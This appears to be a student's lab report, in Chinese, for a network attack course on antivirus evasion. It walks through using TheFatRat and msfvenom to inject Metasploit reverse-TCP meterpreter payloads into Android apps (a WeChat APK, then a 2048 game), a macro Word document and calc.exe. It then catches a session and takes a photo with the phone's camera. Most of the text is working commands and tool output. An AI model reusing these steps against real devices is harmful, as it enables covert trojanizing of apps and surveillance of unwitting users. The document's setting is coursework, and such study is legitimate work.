• 免杀进阶

    20175314 2020-4 《网络对抗技术》Exp3Plus 免杀进阶 Week7


    • 尝试msfvenom生成jar php apk等文件在其他操作系统如mac linux android的实践应用
    • 尝试自己编写加载、运行、加密任意shellcode的代码。可用python ruby java c#等语言实现。
    • 可以更进一步,将shellcode与放入图片等其他文件,实现提取进行
    • 搜索相关文献并学习实践




    • 本来在YouTube上发现了一个据说功能强大的工具FatRat
    • 用git从GitHub下载了很久很久,然后还需要安装各种组件

    mark20175314@kalimark:~/20175314Mark/Exp3/Plus$ git clone https://github.com/Screetsec/TheFatRat.git
    mark20175314@kalimark:~/20175314Mark/Exp3/Plus$ cd TheFatRat
    mark20175314@kalimark:~/20175314Mark/Exp3/Plus$ sudo su
    root@kalimark:~/20175314Mark/Exp3/Plus/TheFatRat$ sudo apt install mingw-w64
    root@kalimark:~/20175314Mark/Exp3/Plus/TheFatRat$ sudo chmod +x setup.sh
    root@kalimark:~/20175314Mark/Exp3/Plus/TheFatRat$ sudo ./setup.sh
    root@kalimark:~/20175314Mark/Exp3/Plus/TheFatRat$ chmod +x powerfull.sh
    root@kalimark:~/20175314Mark/Exp3/Plus/TheFatRat$ chmod +x fatrat
    root@kalimark:~/20175314Mark/Exp3/Plus/TheFatRat$ ./fatrat
     [!]::[Check Dependencies]:
    # FatRat运行需要的组件
     [✔]::[Distro]: Kali
     [✔]::[Release]: kali-rolling
     [✔]::[Check User]: root
     [✔]::[Terminal]: local
     [✔]::[Internet Connection]: CONNECTED!
     [✔]::[Apache2 Server Kali ]: Installation found!
     [✔]::[Ruby]: Installation found!
     [✔]::[Apktool]: Installation found!
     [✔]::[Aapt]: Installation found!
     [✔]::[Msfconsole]: Installation found!
     [✔]::[Msfvenom]: Installation found!
     [✔]::[Mingw64]: Installation found!
     [✔]::[Backdoor-factory]: Installation found!
     [✔]::[Monodevelop-Utils]: Installation found!
     [✔]::[Xterm]: Installation found!
     [✔]::[Gnome-terminal]: Installation found!
     [✔]::[Upx]: Installation found!
     [✔]::[Baksmali]: Installation found!
             WARNING !  WARNING ! WARNING ! WARNING ! WARNING !                                                        
        YOU CAN UPLOAD OUTPUT/BACKDOOR FILE TO WWW.NODISTRIBUTE.COM                                                    
     ____  _____ _____ _____    _____ _____ __    _____ _____ ____                                                     
    |    |     |   | |_   _|  |  |  |  _  |  |  |     |  _  |                                                        
    |  |  |  |  | | | | | |    |  |  |   __|  |__|  |  |     |  |  |                                                   
    |____/|_____|_|___| |_|    |_____|__|  |_____|_____|__|__|____/                                                    
                             _____ _____                                                                               
                            |_   _|     |                                                                              
                              | | |  |  |                                                                              
                              |_| |_____|                                                                              
     _____ _____ _____ _____ _____    _____ _____ _____ _____ __                                                       
    |  |  |     | __  |  |  |   __|  |_   _|     |_   _|  _  |  |                                                      
    |  |  |-   -|    -|  |  |__   |    | | |  |  | | | |     |  |__                                                    
     \___/|_____|__|__|_____|_____|    |_| |_____| |_| |__|__|_____|                                                   
           PLEASE DON'T UPLOAD BACKDOOR TO WWW.VIRUSTOTAL.COM                                                          
        YOU CAN UPLOAD OUTPUT/BACKDOOR FILE TO WWW.NODISTRIBUTE.COM                                                    
    # 一直反复强调不要上传到VirusTotal进行免杀检测,然而它生成的后门程序根本用不了
    Press [Enter] key to continue ..............
    resize: Time out occurred                                                                                          
       ___________ _   _______________  ___  __  ___  ___  _______  _______                                            
      / __/ __/ _  | / /  _/ ___/ __/ / _ / / / / |/ / |/ /  _/ |/ / ___/                                            
     _ / _// , _/ |/ // // /__/ _/  / , _/ /_/ /    /    // //    / (_ /                                             
    /___/___/_/|_||___/___/\___/___/ /_/|_|\____/_/|_/_/|_/___/_/|_/\___/                                              
    Press [Enter] key to Continue...                                                                                      
    • FatRat界面如下图所示,但是可用性还有待验证


    # Ubuntu安装Clamav
    mark@ubuntu:~$ sudo apt-get install clamav
    mark@ubuntu:~$ sudo apt-get install clamav-daemon
    mark@ubuntu:~$ sudo freshclam
    ERROR: /var/log/clamav/freshclam.log is locked by another process
    ERROR: Problem with internal logger (UpdateLogFile = /var/log/clamav/freshclam.log).
    ERROR: initialize: libfreshclam init failed.
    ERROR: Initialization error!
    mark@ubuntu:~$ sudo lsof /var/log/clamav/freshclam.log
    lsof: WARNING: can't stat() fuse.gvfsd-fuse file system /run/user/1000/gvfs
          Output information may be incomplete.
    freshclam 931 clamav    3wW  REG    8,1     9004 952317 /var/log/clamav/freshclam.log
    mark@ubuntu:~$ sudo systemctl stop clamav-freshclam.service
    mark@ubuntu:~$ sudo freshclam
    mark@ubuntu:~$ clamscan -r /home # 扫描用户文件夹


    • Android免杀效果检测方式:华为手机管家

    • Linux免杀效果检测方式:Clamav


    • msfvenom生成jar php apk等文件在其他操作系统如mac linux android的实践应用




           |    |                                                                                                     
          _|____|_       _____ _       _____     _   _____     _                                                      
           /  ee\_      |_   _| |_ ___|   __|___| |_| __  |___| |_                                                    
         .<     __O       | | |   | -_|   __| .'|  _|    -| .'|  _|                                                   
        / .-.'         |_| |_|_|___|__|  |___|_| |__|__|___|_|                                                     
       J  .|'./                                                                                                    
       | |_.|. | | |   [--]   Backdoor Creator for Remote Acces [--]                                                  
        \__.' .|-' /   [--]  Created by: Edo Maland (Screetsec) [--]                                                  
        L   /|o'--'   [--]            Version: 1.9.7           [--]                                                  
        |  ///     [--]          Codename: Whistle          [--]                                                  
        J /      .__ [--]   Follow me on Github: @Screetsec   [--]                                                  
        J /      .__ [--]   Dracos Linux : @dracos-linux.org  [--]                                                  
        |/         /   [--]                                     [--]                                                  
                .'.  [--]     SELECT AN OPTION TO BEGIN:      [--]                                                  
       ____)_/\_(___. [--] .___________________________________[--]                                                  
      (___._/  \_.___)'\_.-----------------------------------------/                                                  
           [01]  Create Backdoor with msfvenom                                                                        
           [02]  Create Fud 100% Backdoor with Fudwin 1.0                                                             
           [03]  Create Fud Backdoor with Avoid v1.2                                                                  
           [04]  Create Fud Backdoor with backdoor-factory [embed]                                                    
           [05]  Backdooring Original apk [Instagram, Line,etc]                                                       
           [06]  Create Fud Backdoor 1000% with PwnWinds [Excelent]                                                   
           [07]  Create Backdoor For Office with Microsploit                                                          
           [08]  Trojan Debian Package For Remote Acces [Trodebi]                                                     
           [09]  Load/Create auto listeners                                                                           
           [10]  Jump to msfconsole                                                                                   
           [11]  Searchsploit                                                                                         
           [12]  File Pumper [Increase Your Files Size]                                                               
           [13]  Configure Default Lhost & Lport                                                                      
           [14]  Cleanup                                                                                              
           [15]  Help                                                                                                 
           [16]  Credits                                                                                              
           [17]  Exit                                                                                                 
    └─────► 5
    [ ]===========================================================================[ ]
    [ ]                                                                           [ ]
    [ ]                          )  (         )      )   (    (        )          [ ]   
    [ ]   (     (        (     ( /(  ) )    ( /(   ( /(   ) ) ) )  ( /(  (     [ ]   
    [ ]   )    )       )    )())(()/(    )())  )()) (()/((()/(  )()) ) )  [ ]   
    [ ]  ((_)((((_)(   (((_) |((_)  /(_))  ((_)  ((_)   /(_))/(_))((_) (()/(  [ ]   
    [ ]  (_)   )\_ )  )\___ |_ ((_)(_))_   ((_)   ((_)   (_)) (_))  _((_) /(_))_ [ ]  
    [ ] | _ ) (_)_(_)((/ __|| |/ /  |     / _   / _  | _ |_ _| | | |(_)) __|[ ] 
    [ ] | _   / _    | (__   ' <   | |) || (_) || (_) ||   / | |  | .` |  | (_ |[ ] 
    [ ] |___/ /_/ \_   \___| _|\_  |___/  \___/  \___/ |_|_|___| |_|\_|   \___|[ ]
    [ ]===========================================================================[ ]
    [ ]            Embed a Metasploit Payload in an original .apk files           [ ]
    [ ] This script is POC for injecting metasploit payload arbitary apk backdoor [ ]
    [ ]===========================================================================[ ]
    Cleaning Temp files
      Your local IPV4 address is :
      Your local IPV6 address is : fe80::20c:29ff:fe77:c759
      Your public IP address is :
      Your Hostname is : 3(NXDOMAIN
           Set LHOST IP:
     Set LPORT: 5314
    Enter the path to your android app/game .(ex: /root/downloads/myapp.apk)
    Path : /home/mark20175314/20175314Mark/Exp3/Plus/MarkWechat.apk                                                   
      | [ 1 ] android/meterpreter/reverse_http    |                                                                   
      | [ 2 ] android/meterpreter/reverse_https   |                                                                   
      | [ 3 ] android/meterpreter/reverse_tcp     |                                                                   
      | [ 4 ] android/shell/reverse_http          |                                                                   
      | [ 5 ] android/shell/reverse_https         |                                                                   
      | [ 6 ] android/shell/reverse_tcp           |                                                                   
      Choose Payload : 3                                                                                              
    [ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]
    | [ 1 ] Use Backdoor-apk 0.2.4a |                                                                                 
    | [ 2 ] Use old Fatrat method  |                                                                                  
    Select Tool to create apk : 1                                                                                     
    [ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]$ 
     Generate Backdoor
     | Name       ||  Descript               || Your Input
     | LHOST      ||  The Listen Addres      ||
     | LPORT      ||  The Listen Ports       || 5314
     | OUTPUTNAME ||  The Filename output    || app_backdoor.apk
     | PAYLOAD    ||  Payload To Be Used     || android/meterpreter/reverse_tcp
            / ______ 
            || _  _ ||
            ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
            |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
            || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
            ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK
            |||_||_|||         AAA  AAA  PPP       KKK  KKK
            ||______||         AAA  AAA  PPP       KKK  KKK
          |____________|            Dana James Traversie
    [*] Running backdoor-apk.sh v0.2.4a on 2020年 04月 04日 星期六 20:21:25 CST
    [+] Android manifest permission options:
    1) Keep original
    2) Merge with payload and shuffle
    [?] Please select an Android manifest permission option: 1
    [*] Decompiling original APK file...done.
    [*] Locating smali file to hook in original project...done.
    [+] Package where RAT smali files will be injected: com/tencent/mm
    [+] Smali file to hook RAT payload: com/tencent/mm/app/Application.smali
    [*] Generating RAT APK file...done.
    [*] Decompiling RAT APK file...done.
    [+] Keeping permissions of original project
    [*] Injecting helpful Java classes in RAT APK file...done.
    [*] Creating new directory in original package for RAT smali files...done.
    [+] Inject package path: com/tencent/mm/hdwrs
    [+] Generated new smali class name for MainBroadcastReceiver.smali: Zipbe
    [+] Generated new smali class name for MainService.smali: Ommig
    [+] Generated new smali class name for Payload.smali: Bbful
    [+] Generated new smali class name for StringObfuscator.smali: Kxuho
    [+] Generated new smali method name for StringObfuscator.obfuscate method: skscn
    [+] Generated new smali method name for StringObfuscator.unobfuscate method: yanvs
    [*] Copying RAT smali files to new directories in original project...done.
    [*] Fixing RAT smali files...done.
    [*] Obfuscating const-string values in RAT smali files...done.
    [*] Adding hook in original smali file...done.
    [*] Adding persistence hook in original project...done.
    [*] Recompiling original project with backdoor...done.
    [!] Failed to recompile original project with backdoor
    Press [ENTER] key to continue to return to fatrat menu
    • 这里显示失败了,然后我重复步骤选择Merge with payload and shuffle但还是失败了
    • 我一开始觉得可能是微信版本比较新的原因,于是我又下载了6.0的老版本但最后还是失败了
    • 最后我找了一个2048小游戏的安装包,选择Use old Fatrat method成功
    [ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++   ]
     | [ 1 ] Use Backdoor-apk 0.2.4a |                                                                                 
     | [ 2 ] Use old Fatrat method  |                                                                                  
     Select Tool to create apk : 2                                                                                     
    [ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++    ]$                                         
      Generate Backdoor
      | Name       ||  Descript               || Your Input
      | LHOST      ||  The Listen Addres      ||
      | LPORT      ||  The Listen Ports       || 5314
      | OUTPUTNAME ||  The Filename output    || app_backdoored.apk
      | PAYLOAD    ||  Payload To Be Used     || android/meterpreter/reverse_tcp
    [*] Creating RAT payload with msfvenom                                                                             
    [✔] Done!                                                                                                          
    [*] Creating a Valid Certificate                                                                                   
    [✔] Done!                                                                                                          
    [*] Starting the merging process of RAT with the APK you selected                                                  
    ruby: warning: shebang line ending with 
     may cause problems                                                      
    [*] Signing payload..                                                                                              
    [*] Decompiling original APK..                                                                                     
    S: WARNING: Could not write to (/root/.local/share/apktool/framework), using /tmp instead...                       
    S: Please be aware this is a volatile directory and frameworks could go missing, please utilize --frame-path if the default storage directory is unavailable                                                                          
    [*] Decompiling payload APK..                                                                                      
    S: WARNING: Could not write to (/root/.local/share/apktool/framework), using /tmp instead...                       
    S: Please be aware this is a volatile directory and frameworks could go missing, please utilize --frame-path if the default storage directory is unavailable                                                                          
    [*] Locating onCreate() hook..                                                                                     
    [*] Copying payload files..                                                                                        
    [*] Loading temp/original/smali/com/bxstudio/game2048/game2048.smali and injecting payload..                       
    [*] Poisoning the manifest with meterpreter permissions..                                                          
    [*] Adding android.permission.ACCESS_WIFI_STATE                                                                    
    [*] Adding android.permission.CHANGE_WIFI_STATE                                                                    
    [*] Adding android.permission.ACCESS_NETWORK_STATE                                                                 
    [*] Adding android.permission.ACCESS_COARSE_LOCATION                                                               
    [*] Adding android.permission.ACCESS_FINE_LOCATION                                                                 
    [*] Adding android.permission.READ_PHONE_STATE                                                                     
    [*] Adding android.permission.SEND_SMS                                                                             
    [*] Adding android.permission.RECEIVE_SMS                                                                          
    [*] Adding android.permission.RECORD_AUDIO                                                                         
    [*] Adding android.permission.CALL_PHONE                                                                           
    [*] Adding android.permission.READ_CONTACTS                                                                        
    [*] Adding android.permission.WRITE_CONTACTS                                                                       
    [*] Adding android.permission.RECORD_AUDIO                                                                         
    [*] Adding android.permission.WRITE_SETTINGS                                                                       
    [*] Adding android.permission.CAMERA                                                                               
    [*] Adding android.permission.READ_SMS                                                                             
    [*] Adding android.permission.WRITE_EXTERNAL_STORAGE                                                               
    [*] Adding android.permission.RECEIVE_BOOT_COMPLETED                                                               
    [*] Adding android.permission.SET_WALLPAPER                                                                        
    [*] Adding android.permission.READ_CALL_LOG                                                                        
    [*] Adding android.permission.WRITE_CALL_LOG                                                                       
    [*] Adding android.permission.WAKE_LOCK                                                                            
    [*] Rebuilding /home/mark20175314/20175314Mark/Exp3/Plus/TheFatRat/temp/app.apk with meterpreter injection as /home/mark20175314/20175314Mark/Exp3/Plus/TheFatRat/temp/app_backdoored.apk..                                           
    S: WARNING: Could not write to (/root/.local/share/apktool/framework), using /tmp instead...                       
    S: Please be aware this is a volatile directory and frameworks could go missing, please utilize --frame-path if the default storage directory is unavailable                                                                          
    [+] Infected file /home/mark20175314/20175314Mark/Exp3/Plus/TheFatRat/temp/app_backdoored.apk ready.               
    [✔] Done!                                                                                                          
    [*] Signing your Rat APK                                                                                           
    [✔] Done!                                                                                                          
    [!] FatRat Detected that you already had a previous created backdoor                                               
    file in (/root/Fatrat_Generated/) with the name app_backdoored.apk .                                               
    [✔] FatRat have renamed your old backdoor to app_backdoored_927.apk                                                
    Your payload has been successfully & signed and it is located at :                                                 
    [*] Removing temporary files                                                                                       
    [✔] Done!                                                                                                          
     Do you want to create a listener for this configuration                                                           
     to use in msfconsole in future ?                                                                                  
     Choose y/n : y                                                                                                    
     Write the name for this config . (ex : myratapk)                                                                  
    Filename : mark2048.apk                                                                                            
    Configuration file saved to /home/mark20175314/20175314Mark/Exp3/Plus/TheFatRat/config/listeners/mark2048.apk.rc   
    • 下面根据提示将重新编译的后门程序从最需要权限的root目录中取出
    • 重新打开一个终端将后门程序复制到我们的实验文件夹下
    mark20175314@kalimark:/$ sudo su
    root@kalimark:/# cd root
    root@kalimark:~# cd Fatrat_Generated
    root@kalimark:~/Fatrat_Generated# ls
    app_backdoored_927.apk  app_backdoored.apk
    root@kalimark:~/Fatrat_Generated# cp app_backdoored.apk /home/mark20175314/20175314Mark/Exp3/Plus/mark2048.apk
    • 然后就把后门程序安装到目标安卓机器上但是程序能够正常运行玩2048小游戏而且打开监听没有反应
    • 经过多次尝试后我选择放弃这个方法


      ||  _____ _             _____     _     _ _    ||
      || |     |_|___ ___ ___|   __|___| |___|_| |_  ||
      || | | | | |  _|  _| . |__   | . | | . | |  _| ||
      || |_|_|_|_|___|_| |___|_____|  _|_|___|_|_|   ||
      ||                           | |               ||
            ||   |=| Microsfot Metasploit Packet [ Easy ] ||
            ||   |=| Version : 1.0.0                      ||
            ||   |=| Code by : Screetsec - Edo Malad      || 
            ||   |=| Codename: Mario Bros                 || 
      |1| Microsoft Stack overflow in MSCOMCTL.OCX
      |2| The Microsoft Office Macro on Windows 
      |3| The Microsoft Office Macro on Mac OS X 
      |4| Apache OpenOffice on Windows (PSH)
      |5| Apache OpenOffice on Linux/OSX (Python)
      |6| Exit
     └─────► 2
       Worked on Microsoft Office on Windows  
       Your local IPV4 address is :
       Your local IPV6 address is : fe80::20c:29ff:fe77:c759
       Your public IP address is :
       Your Hostname is : 3(NXDOMAIN
       Set LHOST IP:
       Set LPORT: 5314
       Enter the base name for output files : markoffice
       Enter the message for the document body (ENTER = default) : 
       Are u want Use custom exe file backdoor ( y/n ): y
     Enter the path to your EXE file .(ex: /root/downloads/myfile.exe)
     Path : /home/mark20175314/20175314Mark/Exp3/Plus/win32calc.exe
       | [ 1 ] windows/shell_bind_tcp              |                                                                   
       | [ 2 ] windows/shell/reverse_tcp           |                                                                   
       | [ 3 ] windows/meterpreter/reverse_tcp     |                                                                   
       | [ 4 ] windows/meterpreter/reverse_tcp_dns |                                                                   
       | [ 5 ] windows/meterpreter/reverse_http    |                                                                   
       | [ 6 ] windows/meterpreter/reverse_https   |                                                                   
       Choose Payload :3                                                                                               
    [ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  ]
      Generate Backdoor                                                                                                
      | Name       ||  Descript               || Your Input                                                            
      | LHOST      ||  The Listen Addres      ||                                                        
      | LPORT      ||  The Listen Ports       || 5314                                                                  
      | OUTPUTNAME ||  The Filename output    || markoffice                                                            
      | PAYLOAD    ||  Payload To Be Used     || windows/meterpreter/reverse_tcp                                       
    [ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++     ]                                          
      Backdoor doc Saved To : /home/mark20175314/20175314Mark/Exp3/Plus/thefatrat/output/markoffice.docm 

    • 即使没有开启杀软,加入宏的docm文件在纯粹的Microsoft Office面前植入就遭到了重重困难
    • 并且在反弹连接上又不出意外地没有反应,FatRat尝试失败(原因未知)


    • 自动化工具尝试失败后回归原始的msfvenom指令比较顺利
    • 切换Kali的网络设置为桥接,Android与Kali互相可以Ping通
    msfvenom -p android/meterpreter/reverse_tcp lhost= lport=5314 R > marktest.apk
    msf5 > use exploit/multi/handler
    msf5 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
    payload => android/meterpreter/reverse_tcp
    msf5 exploit(multi/handler) > set lhost
    lhost =>
    msf5 exploit(multi/handler) > set LPORT 5314
    LPORT => 5314
    msf5 exploit(multi/handler) > show options
    Module options (exploit/multi/handler):
       Name  Current Setting  Required  Description
       ----  ---------------  --------  -----------
    Payload options (android/meterpreter/reverse_tcp):
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LHOST    yes       The listen address (an interface may be specified)
       LPORT  5314             yes       The listen port
    Exploit target:
       Id  Name
       --  ----
       0   Wildcard Target
    msf5 exploit(multi/handler) > exploit
    [*] Started reverse TCP handler on 
    [*] Sending stage (73548 bytes) to
    [*] Meterpreter session 1 opened ( -> at 2020-04-05 23:13:04 +0800
    meterpreter > sysinfo # 查看系统信息
    Computer    : localhost
    OS          : Android 6.0 - Linux 3.10.86-gfbb1a67 (aarch64)
    Meterpreter : dalvik/android
    meterpreter > check_root # 查看系统是否root
    [*] Device is not rooted
    meterpreter > webcam_stream
    [*] Starting...
    [*] Preparing player...
    [*] Opening player at: /home/mark20175314/20175314Mark/Exp3/Plus/SRrZcztL.html
    [*] Streaming...
    [2165:2165:0405/231532.445219:ERROR:zygote_host_impl_linux.cc(89)] Running as root without --no-sandbox is not supported. See https://crbug.com/638180.
    [-] webcam_get_frame: Operation failed: 1
    meterpreter > screenshot
    [-] No screenshot data was returned.
    [-] With Android, the screenshot command can only capture the host application. If this payload is hosted in an app without a user interface (default behavior), it cannot take screenshots at all.
    meterpreter > 
    [*] - Meterpreter session 1 closed.  Reason: Died
    meterpreter > webcam_list
    1: Back Camera
    2: Front Camera
    meterpreter > webcam_snap -i 1 # 这里选择BackCamera即后置摄像头进行拍摄,画质感人并且经过多次测试,如果机器本身在使用这个摄像头,那么后门程序就没有办法进行调用
    [*] Starting...
    [+] Got frame
    [*] Stopped
    Webcam shot saved to: /home/mark20175314/20175314Mark/Exp3/Plus/UqfGeQvt.jpeg

    • 过程很流畅,但是如果FatRat在上面步骤中功能可以如期实现的话实际效果要比后来的方式更好
    • FatRat能够反编译原来的apk文件加入paylord后再重新编译,原理与实验一相似因此也更加实用
    • 而后来的步骤中用msfvenom指令直接生成的apk文件即使没有杀毒软件检测,对于用户来说也不会去主动选择安装和运行这个程序,更不可能实现反弹连接和后门攻击
    • 因为FatRat只是MSF的自动化工具箱,所以原始的msfvenom指令也可以通过模板生成后门程序

    msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=5314 -x calc.exe -k -f exe > markcalc.exe

    • 实验三中我尝试过用以上指令用calc.exe(计算器)为模板注入paylord,并因为加入了-k参数保留了计算器的原有功能
  • 相关阅读:
  • 原文地址:https://www.cnblogs.com/SANFENs/p/12631331.html
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